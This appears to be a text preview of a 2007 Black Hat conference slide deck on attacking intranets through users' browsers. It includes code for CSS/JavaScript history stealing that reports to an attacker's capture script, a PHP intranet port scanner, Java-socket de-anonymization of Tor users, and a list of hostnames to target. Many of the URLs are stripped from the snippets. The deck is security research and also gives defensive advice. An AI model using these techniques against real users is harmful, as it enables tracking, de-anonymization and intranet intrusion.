bh-usa-07-grossman - Hacking Intranet Websites from the...

Info iconThis preview shows page 1. Sign up to view the full content.

View Full Document Right Arrow Icon
This is the end of the preview. Sign up to access the rest of the document.

Unformatted text preview: Hacking Intranet Websites from the Outside (Take 2) "Fun With and Without JavaScript Malware" Black Hat 2007 (Las Vegas) 08.01.2007 Guest Star: Robert “RSnake” Hansen (CEO of SecTheory) Jeremiah Grossman (Founder and CTO) © 2007 WhiteHat Security, Inc. 1 Jeremiah Grossman founder and CTO of WhiteHat Security R&D and industry evangelism international conference speaker Co-Author of XSS Attacks Web Application Security Consortium Co-founder Former Yahoo! information security officer © 2007 WhiteHat Security, Inc. 2 Robert “RSnake” Hansen CEO of SecTheory Founded the web application security lab ( and Co-Author of XSS Attacks Former eBay Sr. Global Product Manager Dark Reading contributor Frequent industry conference speaker © 2007 WhiteHat Security, Inc. 3 Comments from last year... “Disturbing” Brian Krebs, Washington Post “I have to go home and change the password of my DSL router!” several Blackhat attendees “RSnake and Jeremiah pretty much destroyed any security we thought we had left, including the I’ll just browse without JavaScript mantra. Could you really call that browsing anyway?” Kyran © 2007 WhiteHat Security, Inc. 4 The big 3! Cross-Site Scripting (XSS) - forcing malicious content to be served by a trusted website to an unsuspecting user. Cross-Site Request Forgery (CSRF) - forcing an unsuspecting user’s browser to send requests they didn’t intend. (wire transfer, blog post, etc.) JavaScript Malware - payload of an XSS or CSRF attack, typically written in JavaScript, and executed in a browser. Exploiting the SameOrigin Policy Read OK Read Error © 2007 WhiteHat Security, Inc. 5 Getting hacked by JavaScript Malware website owner embedded JavaScript malware. web page defaced with embedded JavaScript malware. JavaScript Malware injected into a public area of a website. (persistent XSS) clicked on a specially-crafted link causing the website to echo JavaScript Malware. (non-persistent XSS) © 2007 WhiteHat Security, Inc. 6 Timeline OWASP CSRF CSRF added as #5 on the OWASP Top Ten project What’s Next? 2007 XSS disclosed everywhere forum posts over 1,000 vulnerable websites. Intranet Hacking WhiteHat Security discovers JavaScript can be used for port scanning MITRE CVE Trends Says CSRF is under reported and predicts stats increase 2006 Web browser hacking takes off DOM-Based XSS Over 70 new attack techniques Amit Klein discovers a new form show up in 2006 of XSS where the server doesn’t see the payload Phishing w/ Super Bait XSRF WhiteHat Security shows how Phishing Jesse Burns (iSec), writes a white attacks using XSS are more effective paper, likes this acronym better Session Riding 2005 Thomas Schreiber discovers CSRF, writes a white paper, changes the name 2004 Client-Side Trojans 2001 Zope discovers Web version of Confused Deputy 2000 1988 Samy Worm Web Worm infects 1 millon MySpace profiles using XSS/CSRF Cross Site Request Forgery Peter Watkins discovers Client-Side Trojans, CSRF, pronounces it "sea surf" HTML Injection CERT issues an advisory about malicious content being uploaded Confused Deputy Original CSRF theory © 2007 WhiteHat Security, Inc. 7 Denial Anger Bargaining Depression Acceptance “I patch my browser, have a firewall and use NAT. What do I have to be worried about?” Browser doesn’t matter much © 2007 WhiteHat Security, Inc. 8 History Stealing using JavaScript and CSS Cycles through thousands of URLs checking the link color. document.body.appendChild(l); var c = document.defaultView.getComputedStyle(l,null).getPropertyValue("color"); document.body.removeChild(l); // check for visited if (c == "rgb(0, 0, 255)") { // visited } else { // not visited } // end visited check Common intranet hostnames make good targets as well... © 2007 WhiteHat Security, Inc. 9 cv documentacion cvs documentos cx domain cy domains cz dominio d domino dallas dominoweb data doom database download database01 downloads database02 downtown database1 dragon database2 drupal databases dsl datastore dyn datos dynamic david dynip db dz db0 e db01 e-com db02 e-commerce db1 e0 db2 eagle dc earth de east dealers ec dec echo def ecom default ecommerce defiant edi delaware edu dell education delta edward delta1 ee demo eg demonstration eh demos ejemplo denver elpaso depot email des employees desarrollo empresa descargas empresas design en mail intranet HR exchange router 0 adam 01 adkit 02 admin 03 administracion 1 administrador 10 administrator 11 administrators 12 admins 13 ads 14 adserver 15 adsl 16 ae 17 af 18 affiliate 19 affiliates 2 afiliados 20 ag 3 agenda 3com agent 4 ai 5 aix 6 ajax 7 ak 8 akamai 9 al ILMI alabama a alaska a.auth-ns albuquerque a01 alerts a02 alpha a1 alterwind a2 am abc amarillo about americas ac an academico anaheim acceso analyzer access announce accounting announcements accounts antivirus acid ao activestat ap ad apache © 2007 WhiteHat Security, Inc. apollo app app01 app1 apple application applications apps appserver aq ar archie arcsight argentina arizona arkansas arlington as as400 asia asterix at athena atlanta atlas att au auction austin auth auto av aw ayuda az b b.auth-ns b01 b02 b1 b2 b2b b2c ba back backend backup baker bakersfield balance balancer baltimore banking bayarea bb bbdd bbs bd bdc be bea beta bf bg bh bi billing biz biztalk bj black blackberry blog blogs blue bm bn bnc bo bob bof boise bolsa border boston boulder boy br bravo brazil britian broadcast broker bronze brown bs bsd bsd0 bsd01 bsd02 bsd1 bsd2 bt bug buggalo bugs bugzilla build bulletins burn burner buscador buy bv bw by bz c c.auth-ns ca cache cafe calendar california call calvin canada canal canon careers catalog cc cd cdburner cdn cert certificates certify certserv certsrv cf cg cgi ch channel channels charlie charlotte chat chats chatserver check checkpoint chi chicago ci cims cincinnati cisco citrix ck cl class classes classifieds classroom cleveland clicktrack client clientes clients club clubs cluster clusters cm cmail cms cn co cocoa code coldfusion colombus colorado columbus com commerce commerceserver communigate community compaq compras con concentrator conf conference conferencing confidential connect connecticut consola console consult consultant consultants consulting consumer contact content contracts core core0 core01 corp corpmail corporate correo correoweb cortafuegos counterstrike courses cr cricket crm crs cs cso css ct cu cust1 cust10 cust100 cust101 cust102 cust103 cust104 cust105 cust106 cust107 cust108 cust109 cust11 cust110 cust111 cust112 cust113 cust114 cust115 cust116 cust117 cust118 cust119 cust12 cust120 cust121 cust122 10 Intranet Hacking Attacks can penetrate the intranet by controlling/ hijacking a user’s browser and using JavaScript Malware, which is on the inside of the network. © 2007 WhiteHat Security, Inc. 11 Compromise NAT'ed IP Address with Java Send internal IP address where JavaScript can access it <APPLET CODE="MyAddress.class"> <PARAM NAME="URL" VALUE="demo.html?IP="> </APPLET> Lars Kindermann function natIP() { var w = window.location; var host =; var port = w.port || 80; var Socket = (new,port)).getLocalAddress().getHostAddress(); return Socket; } Or guess! Since most everyone is on 192.168.1/0 or 10.0.1/0 it’s not a big deal if Java is disabled. © 2007 WhiteHat Security, Inc. 12 JavaScript can scan for Web Servers Attacker can force a user’s browser to send HTTP requests to anywhere, including the to the intranet. <SCRIPT <SCRIPT <SCRIPT ... <SCRIPT SRC=””></SCRIPT> SRC=””></SCRIPT> SRC=””></SCRIPT> SRC=””></SCRIPT> If a web server is listening, HTML will be returned causing the JS interpreter to error. If there is an error, a web server exists © 2007 WhiteHat Security, Inc. 13 Bypassing Tor/Privoxy © 2007 WhiteHat Security, Inc. 14 In case you need to de-anonymize (1) Java sockets do not use the browser network APIs. (no proxy) var l = document.location; var h; var h = 80; var addr = new; var c =, p)); var line = "GET / HTTP/1.1 \nHost: " + h + "\n\r\n"; var s1 = new java.lang.String(line); c.write(java.nio.ByteBuffer.wrap(s1.getBytes())); //Allocate a buffer to read the data from the server. var buffer = java.nio.ByteBuffer.allocate(8000);; alert(new java.lang.String(buffer.array())); - - [27/Jul/2007:09:29:52 -0700] "GET / HTTP/1.1" 304 - "-" "Mozilla/5.0 (Windows; U Windows NT 5.1; en-US; rv: Gecko/20070713 Firefox/" - - [27/Jul/2007:09:29:53 -0700] "GET /log.cgi HTTP/1.1 "200 1879 "-" "-" © 2007 WhiteHat Security, Inc. 15 In case you need to de-anonymize (2) Windows networking microsoft-ds and netbios-ssn sniffing from inside images <img src="file:///\\"> © 2007 WhiteHat Security, Inc. 16 Denial Anger Bargaining Depression Acceptance “What were the browser developers thinking!?!” © 2007 WhiteHat Security, Inc. 17 What about these? Enumerating extensions, OS applications, and usernames Compromising password manager usernames and passwords and that’s besides never ending supply of buffer overflow, cache poisoning, and URL spoofing “exploits” © 2007 WhiteHat Security, Inc. 18 Rich Internet Applications (RIA) more fun to be had... Flash, Active-X, Silverlight, Java, quicktime, windows media player, Acrobat, and hundreds of browser extensions © 2007 WhiteHat Security, Inc. 19 Denial Anger Bargaining Depression Acceptance “I’ll use NoScript, SafeHistory, install a VPN, and maybe turn off JavaScript.” © 2007 WhiteHat Security, Inc. 20 Login Detection Different JavaScript error messages are returned depending on the login/logout status of the user. SafeHistory won’t help. <script src=””> © 2007 WhiteHat Security, Inc. 21 History Stealing without JavaScript Cycle through the same URLs, NoScript won’t help. <html> <style> #links a:visited { color: #ff00ff; } #links a:visited#link1 { background: url('/capture.cgi?'); } #links a:visited#link2 { background: url('/capture.cgi?'); } #links a:visited#link3 { background: url('/capture.cgi?'); } </style> <body> <ul id="links"> <li><a id="link1" href=""></a></li> <li><a id="link2" href=""></a></li> <li><a id="link3" href=""></a></li> </ul> </body> </html> © 2007 WhiteHat Security, Inc. 22 Ping/Web Server Sweep using HTML The LINK tag will halt a rendering page until the host responds or times out. No JavaScript required. <link rel="stylesheet" type="text/css" href="" /> <img src="http://attacker/" /> By measuring the time of the IMG tag request, it’s possible to tell if there is a Web server or host active. The only problem is this method is slow, but Ilia Alshanetsky improved it with a clever technique.... © 2007 WhiteHat Security, Inc. 23 Content-Type: multipart/x-mixed-replace allows segments of HTML that each represent a unique page. When a browser gets a new segment it throws out the old one and renders the new. <?php $boundary = '----'.rand(1000, 9999).'----'; header('Content-Type: multipart/x-mixed-replace; boundary='.$boundary); for ($i = 1; $i < 256; $i++) { echo ' --'.$boundary.' Content-Type: text/html; charset=utf-8 <p>testing ip <b>192.168.1.'.$i.'</b></p> <link rel="stylesheet" type="text/css" href="http://192.168.1.'.$i.'/" /> <img src="'.$i.'&s='.time().' /> '; flush(); sleep(3); } scan.php <?php session_start(); file_put_contents( "/tmp/scan_".session_id().".txt", "{$_GET['ip']} - {$_GET['s']} {$_SERVER['REQUEST_TIME']}\n", FILE_APPEND|LOCK_EX ); No IE Support :( © 2007 WhiteHat Security, Inc. 24 Who needs Web 2.0 hacking when Web 0.9 works just fine. Besides, who really disables JavaScript anyway? OK, OK, outside of this room? Or, what happens when the JavaScript malware is being hosted on a trusted website? (social network, webmail, web bank, etc.) © 2007 WhiteHat Security, Inc. 25 Split VPN Tunnel Hacking Surfing while connected to the corporate network may be secure with content filtering. However, not in the case of split VPN tunnels. Attacker controlled web pages (i.e. can launch several well-known XSS exploits. Intranet targets can be collected through passive recon such as referer leaking or actively through Browser History Hacks. © 2007 WhiteHat Security, Inc. 26 VPN Set-Up © 2007 WhiteHat Security, Inc. 27 VPN Hacking © 2007 WhiteHat Security, Inc. 28 Example Recon - - [01/Mar/2007:16:22:06 -0800] "GET /... HTTP/1.1" 200 6793 "http://" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en; rv: Gecko/20070223 Camino/1.1b" - - [28/Jun/2007:01:15:38 -0700] "GET /... HTTP/1.0" 304 - "http://" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1)" - - [03/Jul/2007:13:21:40 -0700] "GET /... HTTP/1.1" 200 88698 "http://" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" - - [18/Jun/2007:07:00:14 -0700] "GET /... HTTP/1.1" 200 13823 " " "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Tablet PC 1.7; .NET CLR 2.0.50727)" - - [19/Jun/2007:14:12:31 -0700] "GET /... HTTP/1.1" 200 179 "" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv: Gecko/20070515 Firefox/" - - [19/Jun/2007:16:32:29 -0700] "GET /... HTTP/1.1" 200 88699 "http://" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv: Gecko/20070515 Firefox/" © 2007 WhiteHat Security, Inc. 29 30 Airpwn + XSS + CSRF = Arian’s Idea (circa 2004) © 2007 WhiteHat Security, Inc. 30 Denial Anger Bargaining Depression Acceptance “I’m going back to using lynx.” © 2007 WhiteHat Security, Inc. 31 Web security is an oxymoron Firewalls and NAT aren’t what they used to be The browser is patched, so what? I’m not the target, but everyone else on my network is Browser security needs a serious rethink Browser add-ons help, but only by seriously hobbling the user experience so users won’t adopt them anyway Remote users and VPN connections are open to exploitation © 2007 WhiteHat Security, Inc. 32 Denial Anger Bargaining Depression Acceptance “Sure the web is hostile, but I can protect myself.” © 2007 WhiteHat Security, Inc. 33 Web Browser Security Surf with two web browsers or VMware’d Patch, patch, patch, disable, disable, disable Stack up your add-ons (NoScript, SafeHistory, Netcraft Toolbar, eBay Toolbar, etc.) Logout, clear cookies, clear history Stop using laptops like firewalls (relying on the browser to separate domains for us isn’t working) © 2007 WhiteHat Security, Inc. 34 1 wish... Public web pages should not be able to initiate requests to private IPs (RFC). Content-restriction too when you get around to it. © 2007 WhiteHat Security, Inc. 35 Website Security Asset Tracking – Find your websites, assign a responsible party, and rate their importance to the business. Because you can’t secure what you don’t know you own. Measure Security – Perform rigorous and on-going vulnerability assessments, preferably every week. Because you can’t secure what you can’t measure. Development Frameworks – Provide programmers with software development tools enabling them to write code rapidly that also happens to be secure. Because, you can’t mandate secure code, only help it. Defense-in-Depth – Throw up as many roadblocks to attackers as possible. This includes custom error messages, Web application firewalls, security with obscurity, and so on. Because 8 in 10 websites are already insecure, no need to make it any easier. © 2007 WhiteHat Security, Inc. 36 One more thing... CUPS Hacking OS X: http://localhost:631/ Inspired By: Kurt Grutzmacher Seth Bromberger © 2007 WhiteHat Security, Inc. 37 Thank you For more information visit: Jeremiah Grossman (Founder and CTO) Robert “RSnake” Hansen (CEO) © 2007 WhiteHat Security, Inc. 38 References The Cross-Site Request Forgery (CSRF/XSRF) FAQ The Confused Deputy - Original Cross-Site Request Forgery Theory Zope discovers a Web version of the Confused Deputy, calls it Client-Side Trojans CERT® Advisory CA-2000-02 Malicious HTML Tags Embedded in Client Web Requests Peter Watkins discovers Client-Side Trojans, calls it (CSRF, pronounced "sea surf") Thomas Schreiber discovers CSRF, doesn't like the name, calls it Session Riding Jesse Burns discovers CSRF, doesn't like the acronym, changes it to XSRF. DOM Based Cross Site Scripting or XSS of the Third Kind Phishing with Superbait, XSS used to host fake sites on the real website. Intranet Hacking from the Outside and JavaScript Port Scanning Web browser hacking technqiues take off MITRE - Vulnerability Type Distributions in CVE OWASP Top Ten 2007 © 2007 WhiteHat Security, Inc. 39 ...
View Full Document

This note was uploaded on 12/05/2009 for the course CS 172 taught by Professor John during the Spring '09 term at GWU.

Ask a homework question - tutors are online